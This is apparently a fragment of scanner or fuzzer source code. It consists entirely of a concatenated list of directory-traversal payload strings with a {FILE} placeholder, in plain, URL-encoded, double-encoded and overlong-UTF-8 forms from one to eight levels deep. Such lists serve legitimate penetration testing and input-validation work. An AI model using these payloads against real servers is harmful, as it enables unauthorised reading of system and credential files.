"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,..%%32%66{FILE}", + "true,..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,..%%35%63{FILE}", + "true,..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%5c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + 